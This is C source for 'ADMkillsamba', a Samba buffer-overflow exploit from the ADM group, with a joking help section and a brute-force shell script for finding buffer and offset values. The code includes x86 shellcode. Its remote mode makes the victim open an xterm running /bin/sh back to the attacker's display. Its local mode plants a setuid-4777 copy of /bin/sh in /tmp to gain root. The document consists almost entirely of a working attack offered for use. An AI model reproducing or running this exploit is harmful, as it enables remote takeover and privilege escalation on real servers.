/* ___ ______ _ _ / \ | _ \ | \ / | | / \ | | | \ | | \_/ | | |___| | | |_ / | | \_/ | | --- | | / | | | | ''' ''' ''''''' '''' '''' ADMkillsamba ver 0.2 argh ADM back again ! :))) whats new ?: i have include a krad help & a verry Fast utility for found smbserver ; a script shell for make brutal buff/offset for the sploit heh a lot of surprise < hahah supeer:) the buffer have a better structure <4 a better world ??> & option for local sploit :) cya ppl admsmb@hotmail.com #include #include unsigned char shellcode[500] = "\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74" "\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f" "\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd" "\x80\xe8\xcc\xff\xff\xff"; unsigned char localshell[]= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/IK"; void main(int argc, char *argv[]) { FILE *filez; char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; char netbios_name[100]; char bufferz[255]; char ipz[40]; char myipz[40]; unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff"; int *ret; unsigned char cmd[50]="/usr/X11R6/bin/xterm\xff-display\xff"; unsigned char arg1[50]; int i; bzero(netbios_name,100); bzero(bufferz,255); bzero(ipz,40); bzero(ipz,40); if(argc <3){ printf(" usage Remote: ADMkillsamba R [buff size] [offset size]\n"); printf(" = 11.11.11.11 ! THe numerical IP Only ! not www.xxx.cc !\n"); printf(" = VICTIME for get the netbios name use ADMnmbname or ADMhack\n"); printf(" = the sploit send a xterm to your machine heh \n"); printf("option:\n"); printf("[buff size] = the size of the buffer to send default is 3081 try +1 -1 to a plage of +10 -10\n"); printf("[offset size] = the size of the offset default is 3500 try +50 -50 to a plage of 1000 -1000\n"); printf("usage Local: ADMkillsamba L [buffer size] [offset size]\n"); printf(" HaVe Fun\n"); exit(0); } if(*(argv[1]+0)=='R'){ printf("Remote sploit\n"); sprintf(arg1,"%s:0\xff-e\xff/bin/sh\xff",argv[4]); shellcode[4] =(unsigned char)0x32+strlen(cmd)+strlen(arg1); bla[2] =(unsigned char) 0xc9-strlen(cmd)-strlen(arg1); if (argc > 5) bsize = atoi(argv[5]); if (argc > 6) offset = atoi(argv[6]); strcat(shellcode,cmd); strcat(shellcode,arg1); strcat(shellcode,bla); strcat(shellcode,"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"); strcpy(ipz,argv[2]); /* haha u can overflow my sploit :) */ strcpy(netbios_name,argv[3]); } if(*(argv[1]+0)=='L'){ printf("Local sploit\n"); strcpy(shellcode,localshell); strcpy(netbios_name,argv[2]); strcpy(ipz,"127.0.0.1"); filez=fopen("/tmp/IK","w+"); fprintf(filez,"#!/bin/sh\n"); fprintf(filez,"cp /bin/sh /tmp/.sh-r00t\n"); fprintf(filez,"chmod 4777 /tmp/.sh-r00t\n"); fflush(filez); fclose(filez); system("chmod a+x /tmp/IK"); } if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } sprintf(bufferz,"\\\\\\\\%s\\\\IPC$",netbios_name); addr = 0xbffffff0 - offset ; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; execl("./smbclient","smbclient",bufferz,buff,"-I",ipz,NULL); } --------------------------------small help------------------------------------ ADMsmb HELP v0.1 ( a krad help =) ) Q: why the sploit gimme alwais the msg Broken pipe ??? A: ok diz msg appear when you have not the good buffer_size/offset value yes diz param change on every machine ! u must found it! for that try a brutal force on the buff/offset see the script :) -------------------------------Brutal Force----------------------------------- #!/bin/sh declare -i D declare -i OFF declare -i try declare -i BUFF BUFF=3081 # buffer size while true do D=1000 # offset while test "$D" -lt 8000 do ./ADMkillsamba $BUFF $D echo echo $D echo $BUFF echo D=D+25 done BUFF=BUFF+1 done --------------------------------------------------------------------------------- Q: what is the best param for buff/offst .? A: first try with diz param buffer=3081 offset=3500 if is dont work try to change the offset size 1000 at 8000 if he dont run try buff size 3075 at 3090 i know its hard but with experience its simple =) Q: how to found the buff size ?? A: simple ! launch ADMkillsamba with buff/size=1000 if the srv dont make a broken pipe the buffer was to small try by step of 100 when the srv give u a broken pipe ; try to see the precise value ! and make a scan on it =) ex: buff = 3000 no broken pipe buff = 3100 broken pipe buff = 3050 no broken pipe buff = 3070 broken pipe < scan to 3070 at 3100 Q: the offset size ?? A: Scan it :) PS: if u found a offset & buff/size on a system plz send it i'am gonna make a list of the most curently buff/size PPS: if u wanna code a char shell for a other OS mail me ! news: ADM gonna make a home page for diz sploit dont forget to see it for more helps tips/etc cya -------------------------------------------------------------------------------- U CAN GET THE BIN OF ADMFINDALL IN FTP.JANOVA.ORG/PUB/ADM !!!!!!